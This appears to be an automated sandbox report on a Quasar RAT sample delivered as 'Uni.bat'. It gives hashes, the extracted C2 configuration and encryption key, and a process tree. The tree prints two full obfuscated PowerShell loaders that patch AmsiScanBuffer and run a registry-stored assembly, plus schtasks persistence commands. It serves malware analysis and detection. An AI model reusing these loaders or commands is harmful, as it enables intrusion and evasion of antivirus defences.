Analysis

  • max time kernel
    1800s
  • max time network
    1791s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240419-en
  • resource tags

    arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    08-05-2024 17:16

General

  • Target

    Uni.bat

  • Size

    670KB

  • MD5

    6a80458e28d1386f08bbd333e223ec19

  • SHA1

    77ab8b6fa59cc618bf4a5e7f52ffcd8f5c9656a8

  • SHA256

    8711245a4e790f4e757f4657e0edd3ff36cd767293e60b56d8e8501bca9c8a3d

  • SHA512

    e6db2882538d6b563aaeb8df1831ea8c90dd37242fe686e9ab0b80f9c397bdfdf3596b28b036ac9308c456257e7a3cc607657c4e98853647e85d23f8b1588d81

  • SSDEEP

    12288:3X+4dH3qy2pEKjy2YkbOtscQeH8XDYTDL832UtYnUg3:H+4dH3enjy2ZbOzTceUq

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SLAVE

C2

even-lemon.gl.at.ply.gg:33587

Mutex

$Sxr-dOMA5C0pQTTpKjVsCp

Attributes
  • encryption_key

    UBXs44u6E81wxBGZxQHk

  • install_name

    $sxr-powershell.exe

  • log_directory

    $SXR-KEYLOGS

  • reconnect_delay

    3000

  • startup_key

    $sxr-powershell

  • subdirectory

    $sxr-seroxen2

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 18 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:640
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:560
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{9edd912f-2700-4c42-a133-a3e4e5dbe598}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1544
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{8beb6112-fca5-4636-be73-1b10f231c424}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:3804
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:692
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:996
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
            1⤵
              PID:424
            • C:\Windows\system32\svchost.exe
              C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
              1⤵
                PID:992
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1080
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                  1⤵
                    PID:1120
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                      PID:1160
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:sFyQhDzMajQT{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$RuJhYyCjRUaLgO,[Parameter(Position=1)][Type]$lxWkHGlAFs)$ZtCMFrZvESL=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+'e'+'d'+''+[Char](68)+''+[Char](101)+'l'+[Char](101)+'gat'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+''+'r'+''+'y'+'M'+[Char](111)+'du'+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'ga'+'t'+''+[Char](101)+'T'+'y'+'pe',''+'C'+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+',P'+[Char](117)+''+[Char](98)+'lic,'+[Char](83)+'e'+[Char](97)+'l'+[Char](101)+''+[Char](100)+''+[Char](44)+''+'A'+''+'n'+''+[Char](115)+'iC'+[Char](108)+''+[Char](97)+'s'+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+'o'+'C'+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$ZtCMFrZvESL.DefineConstructor(''+'R'+''+'T'+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+'a'+''+[Char](108)+''+'N'+'a'+[Char](109)+''+'e'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$RuJhYyCjRUaLgO).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+'g'+'e'+'d');$ZtCMFrZvESL.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+'u'+''+'b'+'l'+[Char](105)+''+'c'+''+[Char](44)+''+'H'+'i'+[Char](100)+''+[Char](101)+'B'+'y'+'S'+[Char](105)+''+'g'+''+[Char](44)+'Ne'+'w'+''+[Char](83)+''+[Char](108)+''+'o'+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$lxWkHGlAFs,$RuJhYyCjRUaLgO).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+'m'+''+[Char](101)+','+'M'+'ana'+[Char](103)+'e'+[Char](100)+'');Write-Output $ZtCMFrZvESL.CreateType();}$vmAEJvjAuBbOa=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+'t'+'e'+[Char](109)+''+'.'+''+[Char](100)+''+'l'+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+'cr'+[Char](111)+'s'+[Char](111)+'f'+[Char](116)+''+'.'+'W'+[Char](105)+''+[Char](110)+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+'n'+'s'+''+[Char](97)+''+'f'+''+'e'+'N'+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+'e'+'M'+[Char](101)+''+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+''+'s'+'');$KFStMjdlmpwUqJ=$vmAEJvjAuBbOa.GetMethod(''+[Char](71)+''+[Char](101)+'t'+'P'+''+'r'+'o'+[Char](99)+''+'A'+'d'+'d'+''+'r'+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+'ub'+[Char](108)+''+[Char](105)+'c'+','+'St'+[Char](97)+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$zIhAtybJkEgEimNVnvJ=sFyQhDzMajQT @([String])([IntPtr]);$NYadbeluxYtVRpJAMsKdIY=sFyQhDzMajQT @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$wKWtwpZKAgc=$vmAEJvjAuBbOa.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+'le'+[Char](72)+'a'+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object]('k'+[Char](101)+''+[Char](114)+'n'+'e'+''+[Char](108)+''+[Char](51)+''+'2'+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')));$EjRpyncceWEXAn=$KFStMjdlmpwUqJ.Invoke($Null,@([Object]$wKWtwpZKAgc,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+'d'+''+[Char](76)+''+[Char](105)+''+[Char](98)+''+'r'+''+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$DtIYpXmZFcQOwyjcz=$KFStMjdlmpwUqJ.Invoke($Null,@([Object]$wKWtwpZKAgc,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'P'+'r'+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+'c'+''+[Char](116)+'')));$oxwDpWq=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EjRpyncceWEXAn,$zIhAtybJkEgEimNVnvJ).Invoke('am'+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+'l'+[Char](108)+'');$LFpKdnsGXvyDDVLCO=$KFStMjdlmpwUqJ.Invoke($Null,@([Object]$oxwDpWq,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'Sc'+[Char](97)+''+[Char](110)+''+[Char](66)+'uf'+'f'+'e'+'r'+'')));$ntnpXaFqIk=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DtIYpXmZFcQOwyjcz,$NYadbeluxYtVRpJAMsKdIY).Invoke($LFpKdnsGXvyDDVLCO,[uint32]8,4,[ref]$ntnpXaFqIk);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$LFpKdnsGXvyDDVLCO,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DtIYpXmZFcQOwyjcz,$NYadbeluxYtVRpJAMsKdIY).Invoke($LFpKdnsGXvyDDVLCO,[uint32]8,0x20,[ref]$ntnpXaFqIk);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+'T'+'W'+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+'7'+''+'7'+'s'+'t'+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:4604
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          3⤵
                            PID:3704
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ZXHogRbooQXA{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UgzvCAsyKzjbtH,[Parameter(Position=1)][Type]$XAAQLIOxXE)$OyAdvdSIVso=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+'le'+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+'D'+[Char](101)+''+'l'+''+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+''+'M'+'o'+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+'e'+[Char](84)+''+'y'+''+[Char](112)+'e',''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+'l'+''+'e'+''+[Char](100)+''+','+''+'A'+''+[Char](110)+''+[Char](115)+'i'+'C'+'la'+[Char](115)+''+[Char](115)+','+'A'+''+'u'+''+[Char](116)+''+'o'+''+'C'+''+'l'+''+[Char](97)+'s'+'s'+'',[MulticastDelegate]);$OyAdvdSIVso.DefineConstructor('R'+[Char](84)+'Spe'+[Char](99)+''+'i'+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+'e,'+[Char](72)+''+[Char](105)+'d'+'e'+''+[Char](66)+''+[Char](121)+'S'+[Char](105)+'g'+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$UgzvCAsyKzjbtH).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+'t'+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+'M'+'a'+''+'n'+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$OyAdvdSIVso.DefineMethod(''+'I'+''+[Char](110)+''+'v'+'o'+[Char](107)+''+'e'+'','P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+''+','+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+'l'+[Char](111)+''+'t'+''+[Char](44)+'V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l',$XAAQLIOxXE,$UgzvCAsyKzjbtH).SetImplementationFlags('R'+[Char](117)+'n'+[Char](116)+''+'i'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+'ed');Write-Output $OyAdvdSIVso.CreateType();}$FWKzGpkVWPueb=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+'y'+'s'+''+'t'+'e'+'m'+'.dl'+[Char](108)+'')}).GetType(''+[Char](77)+'i'+'c'+''+'r'+''+'o'+''+'s'+''+[Char](111)+''+'f'+''+[Char](116)+''+[Char](46)+''+'W'+'i'+[Char](110)+''+[Char](51)+'2'+[Char](46)+''+'U'+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+'e'+[Char](78)+''+'a'+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+[Char](115)+'');$vOfTvHJElxWYra=$FWKzGpkVWPueb.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'Pro'+[Char](99)+'A'+[Char](100)+'d'+'r'+'ess',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+'i'+'c'+''+','+''+'S'+'tat'+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$pVrsnMgZfHrfaawBQAZ=ZXHogRbooQXA @([String])([IntPtr]);$ucyGMaPXvpQOYoCIANWFVG=ZXHogRbooQXA @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$MEAFIjdgzTM=$FWKzGpkVWPueb.GetMethod(''+[Char](71)+'e'+'t'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+'n'+''+[Char](101)+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+''+[Char](100)+'ll')));$DEwEkhZukuwChS=$vOfTvHJElxWYra.Invoke($Null,@([Object]$MEAFIjdgzTM,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+'i'+''+[Char](98)+'r'+[Char](97)+'r'+'y'+''+'A'+'')));$CgFpWDzPqHldsOlTU=$vOfTvHJElxWYra.Invoke($Null,@([Object]$MEAFIjdgzTM,[Object](''+[Char](86)+''+'i'+''+'r'+''+[Char](116)+''+'u'+''+[Char](97)+'l'+[Char](80)+''+[Char](114)+''+'o'+'te'+[Char](99)+''+'t'+'')));$tsUsIet=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DEwEkhZukuwChS,$pVrsnMgZfHrfaawBQAZ).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'');$xAKuOzTJXTQNHBest=$vOfTvHJElxWYra.Invoke($Null,@([Object]$tsUsIet,[Object](''+'A'+'m'+'s'+''+'i'+''+[Char](83)+'canB'+[Char](117)+'f'+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$azJxSTQMWg=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CgFpWDzPqHldsOlTU,$ucyGMaPXvpQOYoCIANWFVG).Invoke($xAKuOzTJXTQNHBest,[uint32]8,4,[ref]$azJxSTQMWg);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$xAKuOzTJXTQNHBest,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CgFpWDzPqHldsOlTU,$ucyGMaPXvpQOYoCIANWFVG).Invoke($xAKuOzTJXTQNHBest,[uint32]8,0x20,[ref]$azJxSTQMWg);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+'7'+[Char](55)+''+'s'+''+[Char](116)+''+[Char](97)+'g'+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                          2⤵
                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1060
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            3⤵
                              PID:4240
                        • C:\Windows\System32\svchost.exe
                          C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                          1⤵
                            PID:1204
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                            1⤵
                              PID:1212
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                              1⤵
                                PID:1328
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                1⤵
                                  PID:1440
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                  1⤵
                                    PID:1492
                                    • C:\Windows\system32\sihost.exe
                                      sihost.exe
                                      2⤵
                                        PID:3024
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                      1⤵
                                      • Drops file in System32 directory
                                      PID:1536
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k NetworkService -p
                                      1⤵
                                        PID:1576
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                        1⤵
                                          PID:1648
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                          1⤵
                                            PID:1676
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                            1⤵
                                              PID:1748
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                              1⤵
                                                PID:1812
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                                1⤵
                                                  PID:1852
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1944
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1968
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                      1⤵
                                                        PID:1804
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                        1⤵
                                                          PID:1996
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                          1⤵
                                                            PID:2116
                                                          • C:\Windows\System32\spoolsv.exe
                                                            C:\Windows\System32\spoolsv.exe
                                                            1⤵
                                                              PID:2168
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                              1⤵
                                                                PID:2288
                                                              • C:\Windows\System32\svchost.exe
                                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                                1⤵
                                                                  PID:2364
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2476
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                    1⤵
                                                                      PID:2484
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p
                                                                      1⤵
                                                                      • Drops file in System32 directory
                                                                      PID:2520
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                        PID:2592
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2604
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                          1⤵
                                                                            PID:2640
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                            1⤵
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:2656
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                            1⤵
                                                                              PID:2664
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                              1⤵
                                                                                PID:3040
                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                1⤵
                                                                                  PID:2636
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Suspicious use of UnmapMainImage
                                                                                  PID:3292
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
                                                                                    2⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:4152
                                                                                    • C:\Windows\system32\findstr.exe
                                                                                      findstr /e "'v" "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
                                                                                      3⤵
                                                                                        PID:3880
                                                                                      • C:\Windows\system32\cscript.exe
                                                                                        cscript //nologo C:\Users\Admin\AppData\Local\Temp\x.vbs
                                                                                        3⤵
                                                                                          PID:2764
                                                                                        • C:\Users\Admin\AppData\Local\Temp\x.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\x.exe
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2380
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\x.exe" /rl HIGHEST /f
                                                                                            4⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:2444
                                                                                          • C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:3856
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              "schtasks" /create /tn "$sxr-powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$sxr-seroxen2\$sxr-powershell.exe" /rl HIGHEST /f
                                                                                              5⤵
                                                                                              • Creates scheduled task(s)
                                                                                              PID:3948
                                                                                            • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                              5⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:2820
                                                                                          • C:\Users\Admin\AppData\Local\Temp\install.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\install.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4968
                                                                                          • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                            "SCHTASKS.exe" /create /tn "$77x.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\x.exe'" /sc onlogon /rl HIGHEST
                                                                                            4⤵
                                                                                            • Creates scheduled task(s)
                                                                                            PID:3632
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                      1⤵
                                                                                        PID:3424
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                        1⤵
                                                                                          PID:3444
                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                          1⤵
                                                                                            PID:3824
                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                            1⤵
                                                                                            • Suspicious use of UnmapMainImage
                                                                                            PID:3896
                                                                                          • C:\Windows\system32\DllHost.exe
                                                                                            C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                            1⤵
                                                                                              PID:3980
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                              1⤵
                                                                                                PID:4008
                                                                                              • C:\Windows\system32\DllHost.exe
                                                                                                C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                1⤵
                                                                                                  PID:4244
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                                  1⤵
                                                                                                    PID:4372
                                                                                                  • C:\Windows\system32\SppExtComObj.exe
                                                                                                    C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:4820
                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                      C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                      1⤵
                                                                                                        PID:4824
                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                        1⤵
                                                                                                          PID:4788
                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
